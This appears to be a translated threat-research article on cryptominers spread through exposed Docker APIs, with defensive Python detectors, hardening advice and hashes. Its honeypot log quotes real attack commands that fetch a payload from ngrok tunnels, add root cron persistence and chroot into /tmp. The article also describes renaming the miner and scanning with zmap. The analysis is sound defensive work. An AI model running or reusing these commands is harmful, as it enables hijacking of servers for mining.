We analysed the data collected by the honeypots we set up to track threats, and observed significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.
In addition, network scanning tools are deployed to find other exposed containers and applications.
We leave our honeypots as they are, that is, with default settings, without adding security measures or installing additional software afterwards. Note that Docker publishes recommendations for initial configuration that avoid mistakes and simple weaknesses. The honeypots, however, are containers designed to detect attacks aimed at the container platform itself, not at the applications running inside the containers.
The observed malicious activity is also notable because it requires no exploit and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all attackers need to infect many open servers.
The unsecured Docker API allows a user to perform a variety of
On the left is the malware delivery method. On the right is the attacker's environment, which allows images to be deployed remotely.
Distribution by country of 3,762 exposed Docker APIs. From a Shodan search dated 12.02.2019
Attack chain and payload options
The malicious activity was observed not only with the help of the honeypots. Data from Shodan shows that the number of exposed Docker APIs (see the second graph) has increased since we examined a misconfigured container used as a bridge for deploying Monero cryptocurrency mining software. In October last year (2018, current data
Analysis of the honeypot logs showed that the use of the container image was connected with the use of
Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"
As you can see, the deployed files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payloads can no longer be downloaded once they expire.
There are two payload options. The first is an ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools that are used to scan network ranges and then look for new targets.
The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes every time the hash changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.
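Container-creation records like those above carry several indicators a defender can key on: a shell entrypoint driven by an inline -c command, a curl download into a /tmp path, writes to crontab and cron.d, a chroot into a /tmp directory, and payloads served through an ngrok tunnel. The following is an added example (not from the article or Trend Micro) of a small triage function that applies those indicators to constructed records whose shape mirrors the log lines; the record format is an assumption.

```python
import re

# Constructed sample records, modelled on the container-creation entries in the
# honeypot log above (URLs kept defanged, temp-dir names and hashes shortened).
SAMPLE_CREATES = [
    {"Entrypoint": "/bin/sh", "Tty": False,
     "Cmd": '-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfileAAAA '
            '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=AAAA";'
            'echo "* * * * * root sh /tmp/tmpfileAAAA" >/tmp9bedce/etc/crontab;'
            'echo "* * * * * root sh /tmp/tmpfileAAAA" >/tmp9bedce/etc/cron.d/1m;'
            'chroot /tmp9bedce sh -c "cron || crond"'},
    # Benign control: a web server image started the normal way.
    {"Entrypoint": "/docker-entrypoint.sh", "Tty": False,
     "Cmd": "nginx -g 'daemon off;'"},
]

# Each rule: (reason, regex over the Cmd string); patterns also match defanged text.
CMD_RULES = [
    ("downloader writes into a /tmp path",
     re.compile(r"\b(?:curl|wget)\b[^;]*\s-[oO]\s*/tmp")),
    ("cron persistence written under an etc/ directory",
     re.compile(r">\s*\S*/etc/(?:crontab|cron\.d/)")),
    ("chroot into a /tmp directory",
     re.compile(r"\bchroot\s+/tmp")),
    ("payload served through an ngrok tunnel",
     re.compile(r"ngrok(?:\[\.\]|\.)io")),
]

def suspicious_reasons(spec):
    """Return the indicators matched by one container-creation record."""
    cmd = spec.get("Cmd") or spec.get("Command") or ""
    entry = spec.get("Entrypoint") or ""
    if isinstance(cmd, list):      # the real API carries argv as a list
        cmd = " ".join(cmd)
    if isinstance(entry, list):
        entry = " ".join(entry)
    reasons = [why for why, rx in CMD_RULES if rx.search(cmd)]
    if entry.endswith("sh") and cmd.lstrip().startswith("-c "):
        reasons.append("shell entrypoint driven by an inline -c command")
    return reasons

def triage(records):
    """Return (index, reasons) for every record matching at least one indicator."""
    scored = ((i, suspicious_reasons(s)) for i, s in enumerate(records))
    return [(i, r) for i, r in scored if r]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_CREATES):
        print(f"record {i}: " + "; ".join(reasons))
```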
Examples of the HOST and RIP variables, together with the code snippet used to check that no other miners are running.
Before the miner is started, it is renamed nginx. Other versions of this script rename the miner after other legitimate services that may be present in Linux environments. This is usually enough to get past a check against the list of running processes.
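A check that only looks at process names is weak precisely because of this renaming. As an added example (not part of the article), the following Python compares each process's name with where its executable actually lives by reading /proc directly; nginx is the name the article reports, while the other service names in the list are an assumption.

```python
import os
from pathlib import Path

# nginx is the name the article reports; the other service names are an
# assumption about what similar scripts pick. Extend to taste.
SERVICE_NAMES = {"nginx", "sshd", "cron", "crond", "systemd"}
# Directories where a genuine system service binary is expected to live.
SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/", "/opt/")

def masquerade_reason(comm, exe):
    """Explain why (process name, executable path) looks like a renamed binary,
    or return None. `exe` is readlink('/proc/<pid>/exe'); the kernel appends
    ' (deleted)' when the file was unlinked after exec, which dropped miners
    often do but which also happens after a package upgrade, so treat that
    finding as a lead rather than a verdict."""
    if exe.endswith(" (deleted)"):
        return f"{comm}: executable {exe} was removed after start"
    if comm in SERVICE_NAMES and not exe.startswith(SYSTEM_PREFIXES):
        return f"{comm}: service name but the binary lives at {exe}"
    return None

def scan_proc(proc_root="/proc"):
    """Walk /proc and return (pid, reason) for each suspicious process.
    Reading other users' exe links needs root; unreadable or already-exited
    entries are skipped. Returns [] where /proc does not exist."""
    root = Path(proc_root)
    if not root.is_dir():
        return []
    hits = []
    for entry in root.iterdir():
        if not entry.name.isdigit():
            continue
        try:
            comm = (entry / "comm").read_text().strip()  # kernel truncates to 15 chars
            exe = os.readlink(entry / "exe")
        except OSError:
            continue  # kernel thread, exited, or permission denied
        reason = masquerade_reason(comm, exe)
        if reason:
            hits.append((int(entry.name), reason))
    return hits

if __name__ == "__main__":
    for pid, reason in scan_proc():
        print(pid, reason)
```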
The scanner script also has its own functionality. It uses the same URL service to deliver the tools it needs. Among them is the zmap binary, used to scan the network and obtain a list of open ports. The script also downloads another binary that is used to interact with the services found and to grab their banners, in order to determine additional information about a discovered service (for example, its version).
The script also preselects certain network ranges to scan, although this depends on the script version. It also sets the target ports for the services of interest, in this case Docker, before starting the scan.
Once potential targets are found, their banners are grabbed automatically. The script also filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX,
The attack vector is the Docker image, as shown in the following two code snippets.
At the top is the renaming to a legitimate service name; at the bottom is how zmap is used to scan the network.
At the top are the predefined network ranges; at the bottom are the specific ports used to search for services, including Docker.
The screenshot shows that the alpine-curl image has been pulled more than ten million times.
From Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols, one can build
It is important to note that this image (alpine-curl) is not itself malicious, but, as shown above, it can be used to carry out malicious actions. Similar Docker images can also be used for malicious purposes. We contacted Docker and worked with them on this issue.
Recommendations
The incident discussed in this article highlights the importance of considering security from the start, including the following recommendations:
- For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
- Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
- Follow best-practice guidance and enable security mechanisms, for example those from Docker and the built-in security features.
- Use automated runtime and image scanning to learn more about the processes running in a container (for example, to detect spoofing or find vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
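One way to check the first recommendation, as an added example that is neither the article's nor Docker's code: audit the daemon's listening hosts from /etc/docker/daemon.json and the dockerd command line, and flag any tcp:// listener that is bound to all interfaces or runs without --tlsverify. The two sample configurations are constructed.

```python
import json
import shlex

def _hosts_from_argv(argv):
    hosts, i = [], 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 1
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        i += 1
    return hosts

def audit_docker_api(daemon_json, dockerd_cmdline):
    """Return findings for a Docker daemon's listening configuration.
    daemon_json: text of /etc/docker/daemon.json ('' if the file is absent).
    dockerd_cmdline: the dockerd command line (ExecStart= in the systemd unit).
    Note that dockerd refuses to start when 'hosts' is set in both places."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv = shlex.split(dockerd_cmdline)
    hosts = list(cfg.get("hosts", [])) + _hosts_from_argv(argv)
    tlsverify = cfg.get("tlsverify") is True or any(
        a in ("--tlsverify", "--tlsverify=true") for a in argv)
    findings = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue                       # unix:// and fd:// are local only
        bind = h[len("tcp://"):].rsplit(":", 1)[0].strip("[]")
        if bind in ("", "0.0.0.0", "::"):
            findings.append(f"{h}: API bound to all interfaces")
        if not tlsverify:
            findings.append(f"{h}: TCP API without --tlsverify; "
                            "anyone who can reach the port controls the host")
    return findings

# Constructed samples: the exposed pattern behind the article's findings
# beside a hardened configuration with client-certificate verification.
WEAK_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_JSON = """{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}"""

if __name__ == "__main__":
    print(audit_docker_api(WEAK_JSON, "dockerd"))      # two findings
    print(audit_docker_api(HARDENED_JSON, "dockerd"))  # []
```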
Trend Micro helps DevOps teams build securely, ship fast and run anywhere.
Indicators of compromise
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Source: www.habr.com